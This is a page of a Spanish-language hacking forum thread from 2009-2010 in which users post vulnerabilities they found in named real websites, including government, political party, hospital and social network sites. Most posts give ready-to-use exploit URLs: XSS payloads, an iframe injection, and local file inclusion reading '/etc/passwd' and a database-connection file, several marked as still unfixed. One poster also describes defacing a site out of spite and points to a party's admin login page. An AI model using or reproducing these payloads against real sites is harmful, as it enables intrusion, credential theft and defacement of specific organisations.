elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits
| | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | |-+  Recopilatorio de Vulnerabilidades de XSS/SQLinjection
0 Usuarios y 2 Visitantes están viendo este tema.
Páginas: 1 [2] 3 4 5 6 Ir Abajo Respuesta Imprimir
Autor Tema: Recopilatorio de Vulnerabilidades de XSS/SQLinjection  (Leído 60,384 veces)
dimitrix


Desconectado Desconectado

Mensajes: 4.836



Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #10 en: 19 Diciembre 2009, 15:47 »

Sitio web: www.sgae.es
Descubridor: Dimitrix
URL del aviso: http://seguridad.dimitrix.es/index.php/2009/12/18/xss-en-la-sgae-pero-que-penita/
Fecha de descubrimiento: 18/12/09
Fecha de notificación: 18/12/09
Fecha de publicación: 18/12/09
Arreglado: No
Información adicional: Bueno, como ya sabreis la SGAE ha creado una lista con 200 webs que ellos opinan "Ilegales" que quieren cerrar sin órden judicial, y bueno como no tienen muchos cojones no la han publicado, pero como supongo que por cojones mi web (no la pongo por no hacer SPAM) está ahí, pues he decidido darle las gracias cambiando los colorines de  su web:


Código:
http://www.sgae.es/jsp/email-es.jsp?link=[XSS]
En línea




dimitrix


Desconectado Desconectado

Mensajes: 4.836



Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #11 en: 4 Enero 2010, 15:53 »

Bueno para empezar el año os quería preparar una serie de XSS en distintas webs de partídos políticos, pero por la escasez de tiempo no he podido profundizar en este tema, así que os dejo estos dos:

PSOE

El primer XSS se encuentra en la parte de Suscripciones y aunque en realidad se centra en uno, hay muchos.



http://www.psoe.es/generic/subscription.do?action=Password&type=newsletters&href=[XSS]

Otra cosa que encontré “escarbando” en la web del psoe es el panel administrador de tal:
https://www.psoe.es/generic/login_private.jsp

Y por último en el código fuente del panel administrador podremos ver un comentario de un botón entrar que pone “entrar-rojo”

ESPAÑA 2000

En la web de España 2000 queda un XSS muy muy viejo, que aunque ha cambiado la web, se puede acceder igualmente:



http://www.esp2000.org/v3/foto_grande.php?recordID=2862&cuerpo_img=[XSS]

Como curiosidad en la web de España 2000, si creamos un error en la web con por ejemplo el famoso “> aparecerá de título:  “Welcome to the Frontpage”

http://esp2000.org/index.php?page=shop.brow%22%3Ese&category_id=5&vmcchk=1&option=com_virtuemart&Itemid=1

Saludos y hasta la próxima!

Fuente: http://seguridad.dimitrix.es/index.php/2010/01/02/xss-en-psoe-y-en-espana-2000/
En línea




Ari Slash


Desconectado Desconectado

Mensajes: 1.787



Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #12 en: 16 Enero 2010, 18:23 »

Sitio web: http://www.minagri.gob.cl/
Descubridor: Ari-Slash
URL del aviso: http://h4ckvi505.wordpress.com/2010/01/21/vulnerabilidad-en-minagri-gob-cl/
Fecha de descubrimiento: 16 de enero de 2010
Fecha de notificación: 16 de enero de 2010
Fecha de publicación: 16 de enero de 2010
Arreglado: si 18 de enero de 2010 (ni siquiera un gracias ¬¬ )
Vulnerabilidad: LFI
Código:
http://www.minagri.gob.cl/tips/descargar.php?file=../include/php/conectaBD.php
http://www.minagri.gob.cl/tips/descargar.php?file=../../../../etc/passwd
Vulnerabilidad: XSS
Código:
http://www.minagri.gob.cl/buscar.php?txt_busca=d%22%3E%3Ciframe%20src=http://skydrive.cl/foro%3E%3C/iframe%3E%3C




saludos
« Última modificación: 21 Enero 2010, 07:53 por Ari-Slash » En línea

Ari Slash


Desconectado Desconectado

Mensajes: 1.787



Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #13 en: 18 Enero 2010, 02:51 »

Sitio web: lostambos.com.pe
Descubridor: Ari-Slash y el-pollo
URL del aviso: http://h4ckvi505.wordpress.com/2010/01/21/vulnerabilidad-en-lostambos-com-pe/
Fecha de descubrimiento: 17 de enero de 2010
Fecha de notificación: 17 de enero de 2010
Fecha de publicación: 17 de enero de 2010
Arreglado: Si 18 de Enero de 2010 (eliminaron el arhcivo download.php xD)
Vulnerabilidad: LFI
Código:
http://www.lostambos.com.pe/download.php?f=../


saludos
« Última modificación: 24 Septiembre 2010, 17:51 por Ari-Slash » En línea

Ari Slash


Desconectado Desconectado

Mensajes: 1.787



Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #14 en: 18 Enero 2010, 10:23 »

Sitio web: www.ceplag.edu.bo
Descubridor: Ari-Slash
URL del aviso: http://h4ckvi505.wordpress.com/2010/01/21/vulnerabilidad-en-ceplag-edu-bo/
Fecha de descubrimiento: 18 de enero de 2010
Fecha de notificación: 18 de enero de 2010
Fecha de publicación: 18 de enero de 2010
Arreglado: No
Vulnerabilidad: LFI
Código:
www.ceplag.edu.bo/php/descargar.php?file=
« Última modificación: 30 Enero 2010, 08:24 por Ari-Slash » En línea

jdc


Desconectado Desconectado

Mensajes: 3.420


janito dos cuatro...


Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #15 en: 19 Enero 2010, 01:32 »

Sitio web: http://www.ongei.gob.pe <-- Oficina nacional de gobierno electronico e informatica
Descubridor: janito24
URL del aviso: http://h4x0red.blogspot.com/2010/01/xss-en-ongeigobpe.html
Fecha de descubrimiento: 18 de enero 2010
Fecha de notificación: 18 de enero 2010
Fecha de publicación: 18 de enero 2010
Arreglado: No
Información adicional: XSS simple en el buscador.

Código:
http://www.ongei.gob.pe/busquedas/ongei_resultado.asp?txt_parrafo_busq=a%22%3E%3Cscript%3Ealert()%3C/script%3E

Nota:
La pifia debe estar en todas las paginas .gob.pe al parecer las hizo la misma persona. Otro error http://www.ongei.gob.pe/busquedas/ongei_resultado.asp?txt_parrafo_busq=asdfasdfkaskdjf%F1lakjsd%F1lfkj%F1alsdjkf%F1laksjdf%F1lkjal%F1sldkfj%F1alskjdf%F1laksj xD no tiene desactivado los errores asi que debe ser facil encontrar un sqli o similar :S
« Última modificación: 20 Enero 2010, 05:25 por el-pollo » En línea

Ari Slash


Desconectado Desconectado

Mensajes: 1.787



Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #16 en: 19 Enero 2010, 22:09 »

Sitio web: http://www.hospitalvitarte.gob.pe/ <-- Ministerio de salud
Descubridor: Ari-Slash
URL del aviso: http://h4ckvi505.wordpress.com/2010/01/21/vulnerabilidad-en-hospitalvitarte-gob-pe/
Fecha de descubrimiento: 18 de enero 2010
Fecha de notificación: 18 de enero 2010
Fecha de publicación: 19 de enero 2010
Arreglado: No
Vulnerabilidad: LFI
Código:
http://www.hospitalvitarte.gob.pe/download.php?url=


saludos
« Última modificación: 30 Enero 2010, 08:24 por Ari-Slash » En línea

LeGNa29A

Desconectado Desconectado

Mensajes: 85



Ver Perfil
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #17 en: 20 Enero 2010, 03:17 »

Sitio web: http://www.ceoe.es/ceoe/search.search.action
                          http://www.isee.es/isee3/search.search.action
                          http://www.ceifor.es/ceifor/search.search.action
Descubridor:  LeGNa29A
URL del aviso: http://legna29a.blogspot.com/2010/01/vulnerabilidades.html
Fecha de descubrimiento: 19/01/10
Fecha de notificación: 19/01/10
Fecha de publicación: 20/01/10
Arreglado:
Información adicional: XSS en los buscadores, los sites están relacionados.
Código:
<script>alert('XSS')</script>
« Última modificación: 20 Enero 2010, 14:09 por LeGNa29A » En línea

"Sólo en la medida en que nos exponemos a la aniquilación una y otra vez, encontramos aquello que nos hace verdaderamente indestructibles."
(Pema Chödrön)
jdc


Desconectado Desconectado

Mensajes: 3.420


janito dos cuatro...


Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #18 en: 22 Enero 2010, 08:16 »

Sitio web: http://localhost/ <-- Pagina de inicio Wamp
Descubridor: janito24
URL del aviso: http://h4ckvi505.wordpress.com/2010/01/22/vulnerabilidad-en-localhost/
Fecha de descubrimiento: 22 de enero 2010
Fecha de notificación: 22 de enero 2010
Fecha de publicación: 22 de enero 2010
Arreglado: No
Información adicional: XSS en la variable lang.

Código:
http://localhost/?lang=%22%3E%3Ch3%3Exss%3C/h3%3E

Nota:  :xD

En línea

dimitrix


Desconectado Desconectado

Mensajes: 4.836



Ver Perfil WWW
XSS EN TUENTI DIMIRIX
« Respuesta #19 en: 17 Febrero 2010, 23:47 »

Sitio web: http://m.tuenti.com
Descubridor: Dimitrix
Fuente: http://seguridad.dimitrix.es/index.php/2010/02/18/xss-parcial-en-tuenti-movil/
Fecha de descubrimiento: 14/2/10
Fecha de notificación: 14/2/10
Fecha de publicación: 17/2/10
Arreglado: No

Información adicional: XSS EN la variable "email" al enviar las invitaciones:

En línea




Páginas: 1 [2] 3 4 5 6 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
como saltarse un maxlenght para SQLinjection...
Bugs y Exploits
tornar 7 3,500 Último mensaje 19 Abril 2006, 23:05
por Rentero
Como hacer update en SQLinjection
Nivel Web
BlackHKR 6 4,352 Último mensaje 12 Mayo 2010, 20:55
por BHK
Duda SQLinjection en information_schema « 1 2 »
Nivel Web
miguelskk 10 4,419 Último mensaje 17 Julio 2010, 01:46
por TapIt
AYUDA:Captura de paquetes con Wireshark para herramienta SQLinjection
Hacking Básico
NetStorm 1 1,845 Último mensaje 5 Octubre 2011, 00:06
por alpha015
SQLInjection sin acceso a information_schema
Nivel Web
buggy_man 3 1,723 Último mensaje 11 Agosto 2012, 07:17
por afdlkglfgfdgfhgf
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines